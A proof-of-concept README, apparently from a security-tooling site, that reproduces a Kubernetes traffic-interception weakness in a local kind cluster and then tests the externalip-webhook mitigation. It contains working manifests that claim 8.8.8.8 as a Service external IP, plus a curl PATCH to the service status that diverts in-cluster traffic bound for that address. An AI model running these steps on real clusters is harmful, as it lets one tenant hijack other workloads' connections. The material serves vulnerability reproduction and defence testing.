# Create Kubernetes cluster
```bash
kind create cluster --config ./kind.yaml
```
The cluster must have certmanager:
https://cert-manager.io/docs/installation/kubernetes/
# Test vulnerability
```bash
kubectl apply -f - <<'EOF'
apiVersion: v1
kind: Namespace
metadata:
name: kubeproxy-mitm
---
apiVersion: apps/v1
kind: Deployment
metadata:
name: echoserver
namespace: kubeproxy-mitm
spec:
replicas: 1
selector:
matchLabels:
app: echoserver
template:
metadata:
labels:
app: echoserver
spec:
containers:
- image: gcr.io/google_containers/echoserver:1.10
name: echoserver
ports:
- name: http
containerPort: 8080
- name: https
containerPort: 8443
EOF
kubectl apply -f - <<'EOF'
apiVersion: v1
kind: Service
metadata:
name: mitm-lb
namespace: kubeproxy-mitm
spec:
ports:
- name: http
port: 80
targetPort: 8080
- name: https
port: 443
targetPort: 8443
selector:
app: echoserver
externalIPs:
- 8.8.8.8
type: LoadBalancer
EOF
kubectl proxy --port=8080
curl -k -v -XPATCH -H "Accept: application/json" -H "Content-Type: application/merge-patch+json" 'http://127.0.0.1:8080/api/v1/namespaces/kubeproxy-mitm/services/mitm-lb/status' -d '{"status":{"loadBalancer":{"ingress":[{"ip":"8.8.8.8"}]}}}'
# check external IP
kubectl get svc -n kubeproxy-mitm
```
# Test the vulnerability
Deploy the webhook from https://github.com/kubernetes-sigs/externalip-webhook
```bash
kubectl apply -f ./externalip-webhook.yaml
kubectl delete svc -n kubeproxy-mitm mitm-lb
kubectl apply -f - <<'EOF'
apiVersion: v1
kind: Service
metadata:
name: mitm-lb
namespace: kubeproxy-mitm
spec:
ports:
- name: http
port: 80
targetPort: 8080
- name: https
port: 443
targetPort: 8443
selector:
app: echoserver
externalIPs:
- 8.8.8.8
type: LoadBalancer
EOF
curl -k -v -XPATCH -H "Accept: application/json" -H "Content-Type: application/merge-patch+json" 'http://127.0.0.1:8080/api/v1/namespaces/kubeproxy-mitm/services/mitm-lb/status' -d '{"status":{"loadBalancer":{"ingress":[{"ip":"8.8.8.8"}]}}}'
```
Log in to view the POC file snapshot cached by Shenlong Bot
Log in to view